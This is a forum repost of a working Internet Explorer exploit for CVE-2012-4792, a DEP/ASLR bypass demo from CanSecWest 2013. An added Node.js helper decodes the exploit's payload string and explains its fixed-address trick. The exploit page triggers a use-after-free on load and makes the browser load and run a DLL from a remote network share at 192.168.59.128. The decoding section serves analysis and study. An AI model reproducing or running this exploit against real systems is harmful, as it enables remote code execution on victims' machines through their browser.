Nytro Posted April 4, 2013

[h=1]CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT"[/h]

<!doctype html>
<html>
<head>
<script>
// CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" in CanSecWest 2013
// Effective in 32-bit IE on x64 Windows
// Will load \\192.168.59.128\x\x.dll
// https://twitter.com/tombkeeper
function GIFT() {
    var e0 = null;
    var e1 = null;
    var e2 = null;
    try {
        e0 = document.getElementById("a");
        e1 = document.getElementById("b");
        e2 = document.createElement("q");
        e1.applyElement(e2);
        e1.appendChild(document.createElement('button'));
        e1.applyElement(e0);
        e2.outerText = "";
        e2.appendChild(document.createElement('body'));
    } catch(e) { }
    // Force the JScript garbage collector to run now.
    CollectGarbage();
    // Not a URL: the code units below are laid out as little-endian bytes in
    // memory, beginning with the dword 0x7ffe0274 and ending with the DLL path.
    window.location = "\u0274\u7ffe\u4242\u4242\u0014\u0030\u0044" +
        "\u0012\u1212\u0004\u005c\u005c\u0031\u0039\u0032\u002e\u0031" +
        "\u0036\u0038\u002e\u0035\u0039\u002e\u0031\u0032\u0038\u005c" +
        "\u0078\u005c\u0078\u002e\u0064\u006c\u006c\u006e\u0074\u0064" +
        "\u006c\u006c\u002e\u0064\u006c\u006c";
}
</script>
</head>
<body onload="eval(GIFT())">
<form id="a">
</form>
<dfn id="b">
</dfn>
</body>
</html>

Source: CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" - Pastebin.com
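The string assigned to window.location in the demo above is not a URL but a memory image. IE stores a JScript string as UTF-16LE, so the escaped code units become bytes: the first dword is 0x7ffe0274, an address inside KUSER_SHARED_DATA, which Windows maps at the fixed address 0x7ffe0000 in every process, so no information leak is needed to find it despite ASLR; the tail of the string is the UNC path of the DLL that gets loaded, and that DLL's code is the only code that runs, which is why no shellcode, ROP chain or JIT spray is involved. The helper below is an added example, not part of Tombkeeper's demo or of Nytro's post: it decodes the string into the byte image and reads the header off it. Treating bytes 8 to 15 as two (offset, byte length) pairs is this example's own interpretation, not something the post states; it is adopted because the values line up exactly with the two embedded strings, and the code checks that rather than trusting it.

```javascript
// Added analysis helper, not part of the original demo: decode the
// window.location string from the CVE-2012-4792 demo into the little-endian
// byte image IE builds from it, and read the fake structure off those bytes.

// The string exactly as it appears in the demo.
const PAYLOAD =
  "\u0274\u7ffe\u4242\u4242\u0014\u0030\u0044" +
  "\u0012\u1212\u0004\u005c\u005c\u0031\u0039\u0032\u002e\u0031" +
  "\u0036\u0038\u002e\u0035\u0039\u002e\u0031\u0032\u0038\u005c" +
  "\u0078\u005c\u0078\u002e\u0064\u006c\u006c\u006e\u0074\u0064" +
  "\u006c\u006c\u002e\u0064\u006c\u006c";

// A JS string is a sequence of 16-bit code units stored little-endian in
// memory, so "\u0274\u7ffe" becomes the bytes 74 02 fe 7f: the dword 0x7ffe0274.
function toBytes(str) {
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const unit = str.charCodeAt(i);
    out[2 * i] = unit & 0xff;
    out[2 * i + 1] = unit >>> 8;
  }
  return out;
}

function readU16(b, off) {
  return b[off] | (b[off + 1] << 8);
}

function readU32(b, off) {
  return (readU16(b, off) | (readU16(b, off + 2) << 16)) >>> 0;
}

// Decode a UTF-16LE slice back to text (the payload only has BMP characters).
function utf16le(b, off, len) {
  let s = "";
  for (let i = off; i < off + len; i += 2) s += String.fromCharCode(readU16(b, i));
  return s;
}

// Interpretation used by this example (an assumption, not stated in the post):
// after two dwords the header carries two (offset, byteLength) pairs, one per
// embedded string. The pairs are checked against where the text really sits
// in the buffer instead of being trusted.
function parseFakeStruct(str) {
  const b = toBytes(str);
  const name1 = { off: readU16(b, 8), len: readU16(b, 10) };
  const name2 = { off: readU16(b, 12), len: readU16(b, 14) };
  const textStart = b.indexOf(0x5c); // first "\" byte: where readable text begins
  return {
    totalBytes: b.length,
    dword0: readU32(b, 0), // 0x7ffe0274: inside the fixed KUSER_SHARED_DATA page
    dword1: readU32(b, 4), // 0x42424242: filler
    name1,
    name2,
    string1: utf16le(b, name1.off, name1.len),
    string2: utf16le(b, name2.off, name2.len),
    textStart,
    // Do the two fields cover the text exactly, with no gap or overlap?
    fieldsConsistent:
      name1.off === textStart &&
      name1.off + name1.len === name2.off &&
      name2.off + name2.len === b.length,
  };
}

// Hex dump, one dword per line, with an ASCII view of each byte.
function hexDump(str) {
  const b = toBytes(str);
  const lines = [];
  for (let off = 0; off < b.length; off += 4) {
    const chunk = Array.from(b.slice(off, off + 4));
    const hex = chunk.map((x) => x.toString(16).padStart(2, "0")).join(" ");
    const asc = chunk.map((x) => (x >= 0x20 && x < 0x7f ? String.fromCharCode(x) : ".")).join("");
    lines.push(`${off.toString(16).padStart(4, "0")}: ${hex.padEnd(11)} ${asc}`);
  }
  return lines;
}

const r = parseFakeStruct(PAYLOAD);
console.log(hexDump(PAYLOAD).join("\n"));
console.log("dword0 = 0x" + r.dword0.toString(16));
console.log(`name1 @${r.name1.off} len ${r.name1.len}: ${r.string1}`);
console.log(`name2 @${r.name2.off} len ${r.name2.len}: ${r.string2}`);
console.log("fields consistent with text:", r.fieldsConsistent);
```

Run it with node; the dump shows 86 bytes: the header words, then "\\192.168.59.128\x\x.dll" starting at byte 20 (0x14) and running for 48 (0x30) bytes, immediately followed by "ntdll.dll" at byte 68 (0x44) for 18 (0x12) bytes, which is exactly what the four 16-bit fields after the filler dword say. The same decoding applies to any UTF-16 payload string pulled out of an IE exploit, which is why it is worth having as a standalone tool rather than reading the escapes by eye.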